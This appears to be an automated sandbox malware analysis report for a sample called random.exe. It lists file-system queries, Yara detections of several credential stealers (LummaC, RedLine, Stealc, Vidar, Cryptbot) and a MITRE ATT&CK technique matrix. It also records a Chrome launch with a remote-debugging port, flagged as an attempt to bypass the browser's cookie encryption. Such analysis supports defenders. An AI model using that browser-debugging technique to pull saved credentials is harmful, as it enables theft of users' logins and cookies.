Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN

Source: Yara match	File source: 00000010.00000003.2591876244.00000000014B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2478350296.000000000075A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2177777866.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2445420622.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: random.exe PID: 7320, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AGDDD2MYZL6KQO94XW.exe PID: 7648, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1cfdc82c16.exe PID: 2316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 275588fe9c.exe PID: 7880, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 0436fcd702.exe PID: 7808, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

Yara detected Credential Flusher

Source: Yara match

File source: Process Memory Space: f8fdf848d8.exe PID: 8100, type: MEMORYSTR

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: 5f198671b1.exe PID: 7960, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: random.exe PID: 7320, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1cfdc82c16.exe PID: 2316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 0436fcd702.exe PID: 7808, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected RedLine Stealer

Source: Yara match	File source: 0000000E.00000003.2445420622.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 275588fe9c.exe PID: 7880, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 00000002.00000003.1887563920.0000000005230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2599584604.0000000000E51000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.2747944923.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2177777866.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2597406070.00000000009CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2552141313.0000000004F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2178019911.0000000000F51000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AGDDD2MYZL6KQO94XW.exe PID: 7648, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 48b7eec64e.exe PID: 4960, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 48b7eec64e.exe PID: 8016, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: AGDDD2MYZL6KQO94XW.exe PID: 7648, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C550C40 sqlite3_bind_zeroblob,	2_2_6C550C40
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C550D60 sqlite3_bind_parameter_name,	2_2_6C550D60
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C478EA0 sqlite3_clear_bindings,	2_2_6C478EA0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C550B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	2_2_6C550B40
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C476410 bind,WSAGetLastError,	2_2_6C476410
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C47C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	2_2_6C47C050
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C476070 PR_Listen,	2_2_6C476070
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C47C030 sqlite3_bind_parameter_count,	2_2_6C47C030
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4760B0 listen,WSAGetLastError,	2_2_6C4760B0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4022D0 sqlite3_bind_blob,	2_2_6C4022D0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4763C0 PR_Bind,	2_2_6C4763C0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C479400 sqlite3_bind_int64,	2_2_6C479400
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4794C0 sqlite3_bind_text,	2_2_6C4794C0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4794F0 sqlite3_bind_text16,	2_2_6C4794F0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C479480 sqlite3_bind_null,	2_2_6C479480

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	231 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	14 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 Extra Window Memory Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	12 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	11 Scheduled Task/Job	12 Process Injection	4 Obfuscated Files or Information	Security Account Manager	3410 System Information Discovery	SMB/Windows Admin Shares	11 Email Collection	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	11 Scheduled Task/Job	11 Registry Run Keys / Startup Folder	11 Scheduled Task/Job	12 Software Packing	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 PowerShell	Network Logon Script	11 Registry Run Keys / Startup Folder	1 Timestomp	LSA Secrets	1281 Security Software Discovery	SSH	Keylogging	4 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	12 Process Discovery	VNC	GUI Input Capture	115 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Extra Window Memory Injection	DCSync	571 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Masquerading	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	571 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 Remote System Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	12 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Mshta	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report random.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Amadey

Threatname: Cryptbot

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Phishing

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
random.exe